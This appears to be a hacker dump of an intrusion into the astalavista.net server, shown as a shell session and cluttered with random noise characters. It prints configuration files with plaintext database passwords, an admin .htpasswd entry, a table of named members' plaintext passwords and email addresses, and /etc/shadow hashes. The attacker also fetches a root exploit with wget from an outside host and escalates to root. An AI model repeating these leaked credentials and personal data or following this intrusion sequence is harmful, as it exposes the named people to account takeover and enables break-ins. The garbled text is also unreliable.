/** ( e0 b v6 j& f) V _7 y* Mainfile (external) for astalavistaNET v2.0 , D6 i- C5 ?! j4 P: g/ R*7 y4 B8 S- V# T0 `- A- q
* @copyright Astalavista IT Engineering GmbH5 \. _5 O* X7 K
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch> ) ~8 _' \+ k! v9 i" Y/ l9 a* @version 1.0, m2 ` q. g" R7 r
*/- N( B! z: j, S, ^$ @; ?# _- V6 g) m
, V* \$ e+ P- o/ [4 L
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) { $ ]! a7 l% l! c, U! G. f. i/ B $dontStartSession = false; 5 D2 m3 K; `5 |6 X3 r7 B } else {1 v, }1 u8 h: s4 `
$dontStartSession = true;, B$ D ~, Z, s% A5 {8 B$ h
}& s. }8 o$ h3 w1 d! J; a
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’); , P# o: X* l: P c0 O1 M$ Y- T require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);# ^# E1 Y/ [& h
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’); 1 W/ x. L. l3 y require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);1 @! n# V: U( u
+ G9 y& l( M8 }* J/ s9 h
sh-3.2$ cd config 2 c% q' M! f. qsh-3.2$ ls -la2 d8 C& V7 W% \* [& R f7 p& g
total 32: B9 b* y) H* s
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 . - e m) G9 i5 @: b4 p, qdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .. 5 k! u1 T8 I/ q# r-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php! n. I- v9 U7 ~0 y \
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php1 f; y: ^7 u5 l; ]7 h
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php " ~3 W" R% C9 Y4 e- K! e8 }+ ?-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php7 R v1 {; s# f4 ~ c3 j L/ _
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php/ n$ H$ E$ z6 S1 h9 H. B" O# J4 \ f
0 z0 Y- ]0 h) L4 ksh-3.2$ cat com.conf.php 4 X; m F- ^3 E' ?9 x/ K! G" } h1 K- M[snip]! S3 B- g6 v% ]+ C/ ^) s) k( I6 [+ J
//member-database # _' T& v" |' S7 X0 o/ h2 j/ I5 f$_CONFIG['db_mem_server'] = ‘localhost’; $ Z- w0 J4 }2 z( ^$_CONFIG['db_mem_database'] = ‘astanet_membersystem’; % V$ Z2 ?' U0 t" f* {6 Y$_CONFIG['db_mem_user'] = ‘astanet_db’;+ t1 Y" k- H4 Y. J
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;1 f3 u0 m7 C0 ?- k. o; P
$_CONFIG['db_mem_debug'] = false; //true or false 1 d! |$ Y, ]6 w$ \3 y6 l//ads-database7 y1 l, D G+ q/ n
$_CONFIG['db_ads_server'] = ‘localhost’;- {* N$ F* x' }: I! X
$_CONFIG['db_ads_database'] = ‘astanet_ads’; % D& {* B, g+ E, H$_CONFIG['db_ads_user'] = ‘astanet_db’; 5 C8 _7 p2 h+ m% [$ D0 e6 s$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’; 1 k- d1 l7 Q6 ]% n' F+ t$_CONFIG['db_ads_debug'] = false; //true or false* Q7 `) x4 p$ \" @8 S& _0 [8 X
//rainbow-database' q1 N1 w1 |3 N+ i, \
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;# N* o; M6 C' r! W( u0 q
$_CONFIG['db_rainbow_database'] = ‘rainbow’; F2 l2 L8 ?) ~# ?4 W$ J
$_CONFIG['db_rainbow_user'] = ‘dinu’;( W, Z, I6 K+ Q) c L& v7 P
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;( l& g, ?/ _( I4 |/ p& g0 V
$_CONFIG['db_rainbow_debug'] = false; //true or false ; i# X8 u9 d& |8 @; O Q//mailing lists database5 r, u$ O4 T# }" n5 e/ e1 C$ ]; |
$_CONFIG['db_mailing_lists_server'] = ‘localhost’; 9 U9 _$ G- |1 s: f! X- I$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’; * g# Z$ i9 Y' w* t" t/ Q3 r$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’; " T1 c/ c6 p" r6 Q8 ~& r h: G5 v$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’; ! H7 ?8 j. M1 L9 _& h$_CONFIG['db_mailing_lists_debug'] = false; //true or false) ]* u7 ~' O" L# v5 Z
//paypal / j! \$ }% `2 u0 n9 O9 x8 c$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;8 Q) A. S Q" v2 I# B
$_CONFIG['sub_pp_cmd'] = ‘_xclick’; ) k* E# q) G8 p4 G: f$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;: h) M2 t: U( R3 u7 r
$_CONFIG['sub_pp_noship'] = ‘1′;: T+ M# q# P5 s$ C. K2 g
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’; 9 l5 o8 M$ y: I4 f- Z, }' \- X[snip]* O; k& k" @ l7 P% B/ k
0 t% o. R- ] q1 f0 g2 k
sh-3.2$ cd ..0 {# ?/ r4 m3 m5 E' f) j& v
sh-3.2$ cd member# i; y0 z0 u7 e0 k+ n# Y
sh-3.2$ ls -la , a# Q; [- y3 K Z9 {total 20% Y: `5 `+ s2 Y- Q/ ]7 q
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .. d/ c' T+ ~! q) w
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .. 9 H+ P# i* c; |4 d" k. t-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess2 c0 T& y6 Q3 @5 n
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php $ Z$ p6 c/ w+ n9 C: Ysh-3.2$ cat .htaccess( m: V8 ]5 q0 x' X9 O
SecFilterEngine off . b1 \% K) g' d4 e6 G- u* x5 v3 C M) j
sh-3.2$ cd .. # y% N$ h6 N0 W3 _8 f2 p! c2 ^, ^sh-3.2$ cd cron: U7 P! w$ i. `, y' P
sh-3.2$ ls -la; H5 M' x/ H. |4 G" K! u
total 168: ]+ {' m- _+ j+ v. c; T4 W* T* I: L
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 . 3 Z4 ~& y( Y7 Q/ C# n9 A9 Pdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., {! s ^' Q% }0 ~- }: C5 O
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php: q' Q& g) g9 `
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php ) C' h9 p4 K7 B! m p9 n+ y-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php$ s! T. O- I) E6 C! \
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php ; C* R& ^# Y0 } f8 k-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php 5 j* J" Z9 C0 h0 F7 M1 @# {0 \-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php; b2 Q9 w" z% V6 A
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php 1 B. p( v1 W& J& A-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php4 C# v0 E% \' K4 v
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh 5 |$ ^8 r- z1 m h5 w-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php : H; r1 E; b, Q. F( s1 ]0 p-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php7 Z! I9 b$ c. ~3 ?8 A
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php. v B+ |! q0 s% H2 S
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh2 D7 T3 B# \& X9 ~' ~
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php7 q/ d; _* M- K5 V8 G2 _
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php: k% M, Q! b2 ]2 F8 @$ P
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php . _ {2 M2 W& _+ }& I S! M( g-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php 7 n, m5 F# r, H+ _. @0 J% ~0 q7 U-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php6 _5 ~, V) k: P# N5 G
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email; B, V! C5 |: I5 b8 Y
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php : D4 E) s# v0 t7 S O1 V. t-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php. p) E6 k; o0 Y5 d2 ]
( ?% n' n9 i& ?/ vsh-3.2$ cd ../ x3 G7 W7 |( J& C" K8 M" d
sh-3.2$ cd _007 & S" k! P& x, n: Lsh-3.2$ ls -la4 b2 r5 N) y9 p: |: X3 N( [
total 24 : [" i; [4 _" D* [drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .) v( D* @8 j7 {1 L- u
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..- m4 r R2 v; G g
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess 3 h! ^& U/ Q6 Q2 N% s1 ?-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php / x! I8 f) I9 t# n-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php ! O! P* K8 V$ q& E1 V& D1 n- K( H' q) Jdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap/ B+ y& v% y7 \. r1 R9 n z Y
2 C' ?# x* `9 e9 J' z* ]4 Q; `
sh-3.2$ cat .htaccess 4 s* g+ K J( @" e/ ]authType Basic& j! F( |) {8 X
authName Admin) r) ~+ [/ @# U" S" k, q4 z( k
authUserFile /home/astanet/auth/.htadm_pwd 2 G2 ~( S, p: ]8 B. m1 Mrequire valid-user : ~; N2 e3 [1 M! ~% [ , J0 n9 ?$ `$ z% p- E* j* Ish-3.2$ cat /home/astanet/auth/.htadm_pwd0 E" x \5 R1 R& }. s, |
admin2net:CR0bl65MwhfT, i q; r. j$ N
$ _0 }+ |0 U \9 @+ Q# fsh-3.2$ mysql -u astanet_db -p 4 R3 `1 t& [+ a* WEnter password: - P, Q! ^: B4 d! v0 VWelcome to the MySQL monitor. Commands end with ; or \g. 0 ] S+ Z$ ]- z {+ Q9 K& {Your MySQL connection id is 275153( c1 K% [, L) t, D: D
Server version: 5.0.45-community-log MySQL Community Edition (GPL) * j8 @8 Y- ]$ D7 D* h B7 r! f# t
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer. 8 Q6 x8 q3 d1 N" U6 p8 Y/ D+ l7 j & @; f9 [2 j1 j4 Y e8 R, umysql> show databases; : F4 F4 [ p3 g7 v5 M3 ~5 }+———————–+ ' I( I# t) `+ P8 Q' V1 _& ?7 Q| Database | - G' L/ l3 {; t9 i* n2 t+———————–+6 [6 ~. |7 P ]0 j% T3 d
| information_schema |5 Q1 {+ \* J& h0 I: l
| astanet_ads | 2 P4 `9 U9 ?6 M; T) [: l| astanet_mailing_lists |4 Y5 H& d' ^3 L6 E
| astanet_mediawiki | ! c2 v8 b: ^ W0 V0 f, z| astanet_membersystem |$ @9 o) Q4 v) b6 q" l8 f" G s' I Z. Z
| test |! F4 U. h4 |" _
+———————–+ 0 G/ S& W( Y. R+ F: K! f6 rows in set (0.00 sec) 2 C- d( j4 v/ N* V( ?- S% T 2 }& ~ w& C9 Pmysql> use astanet_membersystem A% M% Q5 O- K* p. \0 w; j+ ?$ y
Database changed! ~' _. W# w4 `) }( c9 y! h j
mysql> show tables; ! S3 ?$ A, }) q7 S6 ~6 ^ A/ g+———————————–+% {9 {: b3 K: G/ b- x' s
| Tables_in_astanet_membersystem |0 O0 o4 b1 _5 k) g
+———————————–+ # Q3 H6 ^( J( o| blacklist_categories | $ v: F& l3 \5 J( ^. z| blacklist_content | ! u: `! Q; d3 A2 k6 ]' [# V3 R8 u9 Z| blacklist_levels | 2 G4 a [7 w! X# I1 M| blacklist_mcset |, m* E3 X% }: e3 s: G% o
| dir_categories | $ r) f2 {7 y2 x- ?' h6 F| dir_comments |% `3 \. ^8 X6 C# w& ~
| dir_links |: H$ A& E5 ]& A0 |7 b
| dir_temp |$ n9 ]% F! n) f
| dir_votes | " z/ |* P. ?9 F7 b% P& s, W| documents |; K0 R' Z$ R/ c) T* t
| documents_categories |+ i U9 q+ j) l& \- P J% R; w% ^
| email_content | 9 O- E5 C$ {! T4 n2 ~+ N' Q6 ]| email_settings | . ?( O3 X) [5 o; |7 c! F% @| exploits |( Q, A7 M2 t; g% v
| exploits_categories | + N/ l* E% v0 P, i5 E' z: {" S| exploittree_categories | 0 z; ^$ i% N0 W; f* R9 @+ a! l| exploittree_exploits |+ L' [8 Y4 x% E+ k
| home_values |* z) R0 h( l, Q+ U- ^$ ^
| iso_countries | & n" r4 c+ ^, N1 D( R' q| links_categories | % D1 W, l0 K8 |( s# O| links_records | 9 d, G) l# i+ L1 _| links_unauth |+ R$ f: w' ]0 V: C, w( [, D
| links_votes |4 ]& i L& @+ f2 D( s# S
| log | 3 {. F* n( |/ B9 B2 j! q4 G| news_categories |( |' s% f( ?; w1 A' _4 x; K
| news_comments | . u8 Y2 w+ ~$ z* t" H, e0 r| news_emoticons | / f$ U2 H% g7 q& B" W, b| news_latest |0 A9 n5 @! j3 [. w8 w. M P
| news_messages |+ Z, d! t" v- j2 H; _) n
| news_statistics | . U- ]& {1 E% h+ |" y6 ~" ^| news_votes | " d. v9 j: G2 f& H2 a| prices_content |8 e1 }. C8 F9 j- G+ O- h: a
| prices_offers | 1 ]: a# P. l3 S1 Y8 H' d% P2 [# h| rss_settings | 9 `. Z( @. ]* z| sessions |+ G6 Z# u' C9 F! c' P) A8 \
| stats_signups | 8 q) w$ I T7 y- q| u2u2 | ; [; x* `3 i% S0 r- ^| u2u_contact |1 s# e5 ^ k' h* K1 v0 h
| u2u_settings | % J3 d" g* a( n" u8 s, j1 y; `, x| user_keywords_selected_categories |9 j& M! h9 O6 G* N. |# j
| users | " ^$ q9 U* u. J' s$ ?% S: Z5 D" V0 p| users_ipn_test |+ N8 P0 t' ?4 Q4 c0 t @
| users_keyword_values |0 U. _3 g. ~1 b" k }2 A! x: W1 B- b* N
| users_profile | % Y7 }: P. T7 B6 p3 `# x| users_temp |3 F% q. }: N4 Y0 L+ D
| users_upgrade |# Q" U1 X& f* a! g
+———————————–+ $ \7 `6 n$ g& h* a$ ?, Q! O46 rows in set (0.00 sec) ; S' P5 j: Z/ h4 _* ~2 R8 u. [& N/ _3 c. c, W( m3 y) ^2 O6 I
mysql> describe users; 7 L) `, i6 n$ }9 ~- V/ L3 F' f+————————–+————————————–+——+—–+———————+—————-+3 i8 p: q+ i& m# D
| Field | Type | Null | Key | Default | Extra | r+ _ F- q. c' ~, _+————————–+————————————–+——+—–+———————+—————-+ + }. S! r1 {3 b: x| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |* r& R/ z# w/ O, t0 P
| user | varchar(50) | NO | | | |( M2 k* e# R& k+ X2 r+ X# q4 ?, s
| nickname | varchar(30) | NO | MUL | anonymous | |1 O6 J# M6 P0 Y8 R8 J
| password | varchar(30) | NO | | | |2 h+ p- \7 \4 A$ L T5 M7 `+ Z; y* y
| userlevel | tinyint(3) | YES | MUL | NULL | | 8 Y; z4 C# C1 ^| exp | int(8) unsigned | NO | | 0 | | 2 z) C! g$ J9 ]" M| email | varchar(50) | NO | | | | " P7 s Z/ K/ u/ `* X$ z| ip | varchar(15) | NO | | 0 | | 3 D B- w: G3 h1 H9 K. W7 B7 }3 d| proxy | set(’0′,’1′) | NO | | 0 | | T4 E. I# T7 R. c
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |+ h$ O1 X, E7 Q6 p! o( F' B
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |) _7 y* R( L2 Z3 X8 U6 P) s$ f3 I
| anz_in | tinyint(1) | NO | | -1 | | 6 m, m1 V; D# L3 f' g| status | tinyint(1) unsigned | NO | | 0 | |. R) k( Q2 i# {( G* z# Y8 v, j
| checked | set(’0′,’1′,’2′) | NO | | 0 | | ) P4 w7 |$ D& G: R| freemember | set(’0′,’1′) | NO | | 0 | | 7 Q, _5 n1 A% N: L| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |8 ?# M/ c S3 H9 P" a; M
| lang | tinytext | NO | | | |/ [* b% n6 C( M3 f4 E
| adid | smallint(6) | NO | | 0 | | . l( q$ {- F2 r8 q# a6 L9 o* |) ?| pp_txn_id | varchar(255) | YES | | NULL | |0 O0 K2 O" W$ N0 o1 ]( \$ G
| cnb_transaction_id | varchar(255) | YES | | NULL | |, Y; R/ {! Y0 i
| cnb_order_id | varchar(255) | YES | | NULL | |4 k. _8 O0 [" R) n4 l8 f3 y% U
| cnb_user_id | int(11) | YES | | 0 | | ; V( `- q( [9 Z, f7 G& ]6 E" g+————————–+————————————–+——+—–+———————+—————-+ 0 @! W; [, ?4 N; q1 j22 rows in set (0.01 sec)5 g' \( |: Z- q! i0 H( \9 D
9 Y# m! A% ?- K6 z. jmysql> select count(*) as skids from users; z, R& O3 q! s2 \+——-+9 v( r8 ]* |' D' H$ Z, L
| skids | % a! B! Z9 l) @* s- C) x+——-+# V' G; S+ N7 s% L+ q. C/ S
| 25199 |- @, t; l1 _7 ^$ V7 Q1 J
+——-+ ; X7 G5 ]! k3 u1 row in set (0.00 sec) * J# k0 ^# {8 h( s$ m1 U+ W2 l7 C8 D Y$ R# H
mysql> select user,nickname,password,email from users where userlevel = 1;) W) l# v z% W: C7 h: e2 M/ |, z
+————————–+———————-+——————+———————————–+ , f# M2 m" K% t+ `| user | nickname | password | email | ^' ]& l/ x% j( @# m
+————————–+———————-+——————+———————————–+, \8 q) W8 O( Z& v
| pascal | prozac | astaman3 | 链接标记info@astalavista.net | : m* f4 b1 A8 C( `8 _# K w! f| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |! q M( o$ b( I. e- Q
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |: i0 o; N/ y1 x2 `. N" I* \% g
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net | / z$ k- E: p$ w3 h; ?| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk | $ f- U9 [) t& {6 p; I; r| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |; V) a1 b5 J2 C9 p, H
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |9 Z6 v+ y1 q5 d$ N f' U& w. b
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com | " x2 [' q8 Q6 ^; b! _3 F! k| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com | $ F! Y3 X% c* c+ ^. w| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com | & _2 T* }, e' v" X8 u \| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |$ _7 l5 j: K ?' L0 b% y; m
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |( s; [9 x# G2 ?5 i! }; m
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |! S! O& D& I. _' a0 u: J) j6 D
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |$ r% A9 _/ }& ?# D/ d
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |; w7 f9 W, V8 i; {) h& b
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |. G$ c; g# I( F3 [* X" l2 K1 j
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch | - g* f2 u# X5 c! [/ W2 ]: P| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |" y; S* [) `! y& d
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch | ; Q+ Z* D1 Y5 p, X( f# d| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com | / D5 h( A* N2 ~( ~| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |# C. p% z( F3 {
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |: B2 B+ m3 z! u, a$ |' V
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com | / ^7 N+ b1 A( i! S, h4 `* V3 M7 v+ a| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch | . c7 P0 M( D/ M$ S( O| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com | ^/ e' s7 e1 {( u" ?( @! f" I| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com | $ P* U& ^8 b7 H1 j9 ?& y* q. i, m| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |7 V) ]- e" |/ {
+————————–+———————-+——————+———————————–+8 o) n# s3 O8 e& l# G& E% c4 m
27 rows in set (0.00 sec) ) L _4 P: Z8 o& R1 l7 c+ o! B 5 P" `6 ]) i0 N9 f) gmysql> exit;7 S5 g0 J' O, N* h% \. v F. ?, D
Bye , K( @: N; E! q8 Q# B- n . k7 ^$ l/ w! U* ?9 Q[~] plaintext passwords? yes,- W8 h8 s: _% O2 |) e$ J6 k# a. `
Those so called “security professionals” who charge you $6.66 / month to : Y, O( E1 e, Y' ~register at their hack-proof portal, save your passwords in plaintext… 6 ~/ f+ o) z5 d) }1 Z: pbrilliant!6 q* w' D7 U; l
. I0 \3 C, Y- Z8 b u8 p
[~] This been fun but we want more.: O) B L1 j( i& j z0 i$ t
5 ]+ e" {- ?% Ssh-3.2$ uname -a $ p* Q+ s7 ?! a! TLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux * M# g6 ]! Y; `0 lsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]1 F m( I, w/ r& [
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]: `: |, L w( R% A
Resolving anti.sec.labs… 13.33.33.37 - ~# G$ A) s0 FConnecting to anti.sec.labs|13.33.33.37|:80… connected. 5 F* C) z' O8 Y. V" p9 T, OHTTP request sent, awaiting response… 200 OK6 @8 Y" u4 i x) d U$ H s
Length: 18200 (18K) [text/plain] * Q+ e2 I- u+ _ p1 o2 NSaving to: `g0troot’ 6 V: v1 ^; ?5 m" B7 V% }1 M9 s# b3 D3 |) l8 M& {7 E: G
100%[=========================================================================================================================================>] 18,200 58.6K/s in " U' Y& V2 y! U8 {3 ]0.3s % T8 u3 ]" g* C) x" k ( M% x6 W: a7 x2 r# Y8 I6 |8 A18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200], S' r8 v; I5 z5 p+ O0 y$ a
9 C+ H) |0 q8 W) _% Y( x4 s[+] r00tr00t' k% B8 ?; i) Z+ I/ V
[~] Executing shell… / C. P Z' ^% q+ s) S/ v& g: G6 s! C. r p
sh-3.2# id 2 A3 k( \& S- S9 q( N1 g1 }8 ~uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)( l. W' @. R c4 p1 {! G* B5 ~. t
9 u0 L2 T5 j# Q0 _& Jsh-3.2# cat /etc/shadow. p7 W2 Z# Q( l: I. \
root1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7::: " k9 ^% n, S, M: V- s; x7 O' T3 [2 l[snip]4 s: l% Y! L3 I& Q2 q7 ?
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7::: % ^: I0 j u( `) [8 m1 Ojon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::% F) V& T& a5 P4 ^( c
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7::: M0 H# ~- ~* N |astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7::: # s0 f8 i2 a( u I6 ~# y * A Q: v, A" w# d3 fsh-3.2# cat /etc/motd Q8 @& G* N S( Q
##################################################### 5 i) G" S% Z5 \% K" _#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ # H! X0 j( ~6 E r# L! c# |__| [__ | |__| | |__| | | | [__ | |__| #, }6 T' r/ J* D3 E0 }7 \& l1 }7 N
# | | ___] | | | |___ | | \/ | ___] | | | # 4 Z: W1 A8 s, m( h8 v, r( H# # 4 Q, a% [1 y& {$ }4 }! Y: ?#####################################################4 e" [# x, E( `& ]
# # : @" i n" F: g$ r+ w$ o. t7 E2 J# Admin Contact - 链接标记support@secureservertech.com # , [ k e; r' D7 y2 S) i# #) L, i, b [% n9 b
# Available ShortCuts #) L8 |5 G! Q' }" X2 ]5 I
# # 1 m3 d3 ^, J9 I; Z* M5 ?( J# nst - list active connections #- k( `3 p7 [% K' w
# ddos - shows how many times each ip is connected #6 V+ _( j9 H: y1 b/ |) O
# ltr - restart the webserver #0 O7 Z: y! e3 `9 G$ B6 t: P
# phpc - edit the php config file # # a& Y# @5 z7 }+ h( u4 I# V9 h; ]# htc - edit the webserver configuration file #% C' s9 e: v r2 R5 B
# up - uptime #. G; P- X: p0 Q1 T
# etd - edit the motd of the day file # , ~9 r& A% _% v) Y# htr - start and restart apache if needed #6 f4 P/ r& Y; t' [4 ?( S6 l7 o
# syng - shows active SYN_RECV connections #3 V' v9 K2 o( i; J0 r+ _, V0 h# Z
# synd - syn flood blocker - “synd -h” for usage #4 u" C* e9 \. }4 j4 v
##################################################### 3 @' q( G+ p$ J/ A# G. \6 q# NOTES: #7 Q( v. S$ U6 F4 k* x! L
# Last Upgrade - 12-08-2008 by JF # + t6 B0 D, S4 {+ J& ?4 m# My.cnf/Mysql Optimization - 1-28-09 # 4 A; @& `8 u, Z9 Z9 y# # ; m7 E8 |0 w; |7 K$ z! ^/ i# # 4 \4 n; d5 `. t# n8 n O+ |* M) ~, F) ]# #$ U+ p8 B$ B2 u4 B3 f$ x. u
##################################################### + P; Z6 c9 q2 e5 Y" i" A. n5 O M( x/ G# P
sh-3.2# lastlog | grep -v Never7 }( {- E$ Y$ j
Username Port From Latest - e% x* s. Y; {8 proot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20093 u6 R/ K3 s0 \
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008 ; ~6 \& ]+ U: ?: q1 N: L, v- ?com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009 . R7 i! ~; ?( ~9 R: x8 B7 Wastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009 # P& Q- ?# s: q* X* n5 n6 t# M6 A+ g. n V! k- E; s5 K
sh-3.2# ls -la7 A# U& m- Z; [# w
total 4533764 w' z2 Z# H" g/ p. a7 |# l2 K
drwxr-x— 15 root root 4096 Jun 4 08:40 .) a! W, A" V& H5 @4 G6 z
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. : g: p9 Y" A. I" B-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip 4 K- _- ?" ]% a" P( L-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg4 D, \/ \% h: H# f2 ?+ ~
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history" x1 ?6 s3 h7 x, H! E3 `
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout$ _1 b: h3 f0 L" X7 }0 U2 w
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile ; e# s, H8 j% x4 U+ } a: w. T-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc # Z, e( W) R1 {4 b. i! y' K& g-rwx—— 1 root root 1899 Oct 28 2007 bk.sh2 l5 J- A) R7 S4 x3 u- S
-rw-r–r– 1 root root 1327 Nov 29 2007 cert ; `5 N" f1 H! k" H8 Q-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql9 D3 C0 J. j+ `; y- o7 ]
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan * B) q; Y9 j I7 v" n-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc ' b7 s1 Z. N+ }8 O d# g' D-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql / }# o! ^ Y0 D& Y: }drwx—— 2 root root 4096 Oct 28 2007 .elinks / B, {& [+ I- y9 V" v/ M) ddrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1 ( y! b$ P0 m9 e/ M P1 ]9 _-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz20 p) n" R) M' d" Q$ P8 C) M8 f4 u
-rw——- 1 root root 0 Apr 16 13:19 .history$ b/ ^6 D. U$ {& l# C
